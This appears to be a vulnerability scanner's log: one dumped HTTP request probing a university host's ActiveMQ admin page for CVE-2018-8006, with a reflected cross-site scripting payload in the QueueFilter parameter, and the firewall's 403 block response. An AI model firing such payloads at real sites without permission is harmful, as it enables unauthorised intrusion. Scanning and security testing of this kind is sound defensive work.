[CVE-2018-8006] Dumped HTTP request for https://enrolments.hildas.unimelb.edu.au/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68


GET /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 HTTP/1.1
Host: enrolments.hildas.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2018-8006] Dumped HTTP response https://enrolments.hildas.unimelb.edu.au/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 831
Cache-Control: no-cache, no-store
Content-Type: text/html
Set-Cookie: visid_incap_3211538=ud+XXKQLSR6hYaF/eyBHJAxyk2gAAAAAQUIPAAAAAABXDkkXs6PvBAwtr66TdS43; expires=Thu, 06 Aug 2026 07:06:45 GMT; HttpOnly; path=/; Domain=.hildas.unimelb.edu.au
Set-Cookie: incap_ses_237_3211538=i5R6TMLNB3F+6barov5JAwxyk2gAAAAAiM1M3gZQtgd+YjQM4BmzTA==; path=/; Domain=.hildas.unimelb.edu.au
X-Iinfo: 5-4041458-0 0NNN RT(1754493453269 10) q(0 -1 -1 -1) r(0 -1) B15(1,903758,0) U18

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script src="/Front-Night-supt-I-keepe-mans-his-rauing-it-of-N" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=5-4041458-0%200NNN%20RT%281754493453269%2010%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29%20B15%281%2c903758%2c0%29%20U18&incident_id=237000430032587158-21069984288279237&edet=15&cinfo=01000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 237000430032587158-21069984288279237</iframe></body></html>
